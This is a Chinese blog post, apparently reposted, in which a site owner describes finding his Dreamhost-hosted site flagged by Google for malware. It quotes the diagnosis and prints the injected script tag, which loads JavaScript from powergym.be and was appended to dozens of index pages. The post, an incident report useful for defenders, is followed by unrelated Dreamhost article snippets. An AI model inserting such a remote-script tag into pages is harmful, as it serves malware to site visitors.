在Dreamhost遭遇挂马: powergym.be

最新推荐文章于 2020-09-27 14:58:27 发布
最新推荐文章于 2020-09-27 14:58:27 发布
阅读量92 收藏
点赞数
文章标签: Google 软件测试 JavaScript PHP 应用服务器 ViewUI

4月1日中午,有朋友发来邮件: 访问 chedong.com 的页面时;
该网站可能含有恶意软件,有可能会危害您的电脑。
http://www.google.com.hk/interstitial?url=http://www.chedong.com/

到Google的诊断页看了一下:

我们过去 90 天内对此网站上的 2 张网页进行了测试,发现有 1
张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是
2010-03-31,上次在此网站中发现可疑内容的日期是 2010-03-30。
Malicious software includes 2 exploit(s). Successful infection
resulted in an average of 1 new process(es) on the target machine.
恶意软件托管在 3 个域上,其中包括 surrogaty.uz.ua/, abseconbluedevils.org/, powergym.be/。
2 个域以传播媒介的身份向此网站的访问者散发了恶意软件,其中包括 abseconbluedevils.org/, help2strike.org.ua/。
This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

登录到服务器上:
grep -R powergym *
发现数十个目录缺省页 index.html index.php default.html 全部在3月30日被附加了这样一行script:
script language='JavaScript' src='http://powergym.be/xxxxss36dj.js'

回家后断断续续折腾了2天,终于将大部分目录回滚到了3月30日之前;近期还在和DreamHost联系,查看系统登录日志,查看各个目录下的应用安装情况;

iteye_3224
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
myhappygecko:myhappygecko.com
07-08
我的快乐壁虎 介绍 My Happy Gecko 是一种资源,可供家庭了解更多有关照顾 Leopard Gecko 的内容。 它将包含必要工具的购物清单以及详细介绍如何使用这些工具的视频。 教育是关键,确保语言和内容对... Dreamhost.com
go-dreamhost:转到用于访问Dreamhost API的库
04-12
去做梦的主人 go-dreamhost是用于访问的Go库。 用法 import "github.com/sgerrand/go-dreamhost" 构造一个新的...go-dreamhost客户端将通过在创建新客户端时提供的API密钥进行传递。 执照 该库是根据分发的。
WordPress托管比较,第2部分:WordPress.com和VPS
culi3182的博客
08-25 278
In part 1 of this WordPress hosting series, I showed you the differences and benefits of four different solutions. In this second part I’ve prepared a screencast in which I show you how to set up a Wo...
获取在WordPress网站上工作的Dreamhost统计页面
CSS 初学者指南
06-22 87
对于由Dreamhost托管的网站,默认情况下,您在yoursite.tld / stats /上具有一个分析页面。 WordPress可能会干扰这一点,认为您正在尝试链接到页面或类别,而是改为生成一个404页面。 只需将其添加到您的.htaccess文件中,在典型的#BEGIN WordPress内容之上即可使其再次运行。 <IfModule mod_rewrite.c> ...
Dreamhost 提示No input file specified. 的解决办法
____
06-22 2546
如果开启FastCGI模式,.htaccess无法生效,一直提示no input file specified。 因为在Fastcgi模式下,php不支持rewrite的目标网址的PATH_INFO的解析  ThinkPHP运行在URL_MODEL=2时,会出现 No input file specified.的情况,  这时可以修改网站目录的.htaccess文件:(by default7
HTTPS迁移:Dreamhost上托管的WordPress博客
cunbei2644的博客
09-26 612
dreamhost 优惠码I use Dreamhost. Have been since 2008. If you're not using Dreamhost... well, go sign up and here's $50 off of the $97 yearly plan. 我使用Dreamhost。 自2008年以来一直。如果您不使用Dreamhost ...那么,快去注册吧, ...
使用DreamHost当GoDaddy域名的服务器 步骤
晴天的专栏
02-01 2238
1. 在GoDaddy管理员页面中改变DNS设置,指向DreamHost Name servers: 进入Domain details page: 目前在  SETTINGS -> Nameservers. 数值还是默认值: NS11.DOMAINCONTROL.COM NS12.DOMAINCONTROL.COM 我们需要将它修改为 DreamHost nameserv
dreamhost 好用吗_如何为DreamHost托管的电子邮件域配置SPF?
cuma2369的博客
07-22 374
dreamhost 好用吗My domain’s email is hosted by DreamHost and all my emails from that domain are sent using DreamHost’s SMTP. How to configure the SPF record for my email domain hosted by DreamHost? 我的域的电...
2010年8月最新Dreamhost优惠码:DM001
Klipdas csdn blog
09-02 111
2010年8月最新优惠码: 1年期:DM001 提供优惠50美元(原价119美元); 2年期:DM002 提供一个域名,优惠25美元;原(214.80美元) 为什么要使用Dreamhost优惠码? Dreamhost每年费用为119美元,但第一次购买可以通过使用上面的两个优惠码,可以优惠;另外购买DreamHost主机后,你也可以自己创建Dreamhost优惠码,并使用Dreamhos...
dreamhost 好用吗_在Dreamhost上安装ExifTool
cunbei2644的博客
09-27 150
ExifTool looks like a very promising tool to fiddle with all sorts of JPEG metadata (needed for smush.it) but first I had to make sure I can install it on Dreamhost. Although installation didn't go as...
dreamhost 好用吗_在Dreamhost上安装pngcrush
cunbei2644的博客
09-26 129
dreamhost 优惠码pngcrush is an excellent optimizer for png images, simple and fast, highly recommended. Basically any time before you post a PNG on the web, you should run it through PNGCrush. It's a com...
dreamhost:在 NGINX 出现 502 错误时重新启动 Dreamhost PS
06-21
标题 "dreamhost:在 NGINX 出现 502 错误时重新启动 Dreamhost PS" 涉及到的问题是关于 Dreamhost 服务器平台上的 NGINX web 服务器遇到 502 Bad Gateway 错误时的处理方法。502 错误通常意味着 NGINX 作为前端...
dreambox:基于DreamHost共享主机的Vagrant环境
02-06
将DreamHost共享托管环境重新创建为Vagrant框。 该项目存储库包含用于的代码。 要在您的项目中使用Dreambox,请查看的。 套件版本 Ubuntu 14.04 LTS 包 版 ndn-php56 5.6.36 ndn-php70 7.0.30 ndn-php71 ...
sjwc-dh-api:DreamHost API的CLI
02-15
DreamHost API命令行界面用法$ npm install -g sjwc-dh-api$ dh-api COMMANDrunning command...$ dh-api (-v | --version | version)sjwc-dh-api/0.0.2 linux-x64 node-v12.16.3$ dh-api --help [COMMAND]USAGE $ dh...
005 - 马科维茨投资组合理论实现
08-10
python基于tushare实现马科维茨投资组合理论实现
基于ASP的学生信息档案管理系统毕业论文及源码.rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT).zip
最新发布
08-10
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT)
毕业设计,基于ASP+SqlServer开发的高校工资管理系统,内含完整源代码,数据库,毕业论文
08-10
毕业设计,基于ASP+SqlServer开发的高校工资管理系统,内含完整源代码,数据库,毕业论文 随着网络应用技术的飞速发展,基于网络的应用系统给人们带来了诸多便利。建立高校工资管理系统是为了适应现代化校园管理的需要,方便管理职工工资情况和职工个人信息;同时也方便职工可以上网查询自己的工资信息,还有利于提高办公效率,改善办公质量,规范高校职工工资的常规管理工作。 高校工资管理系统的开发是基于B/S结构,采用ASP编程技术及SQL Server数据库进行开发。本文首先对网站开发环境和运行平台、数据库、ASP编程技术做了简要的介绍,并对工资管理系统的设计进行了详细的需求分析;然后给出了高校工资管理系统的设计方案及系统的具体实现,实现了高校工资管理系统的构建,主要包括系统工资管理模块、职工信息查询模块和系统信息管理及维护模块;最后,通过测试与分析,说明该系统运行稳定、可靠,具有一定的实用价值。 关键词:工资管理系统;信息查询;信息管理;信息维护;网络数据库
wordpress 怎么上线
05-05
一般来说,WordPress 官方推荐的主机服务提供商有 Bluehost、DreamHost 和 SiteGround 等。 2. 在您的主机服务提供商处安装 WordPress。大多数主机服务提供商都提供了一键式 WordPress 安装程序,您只需要按照指示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值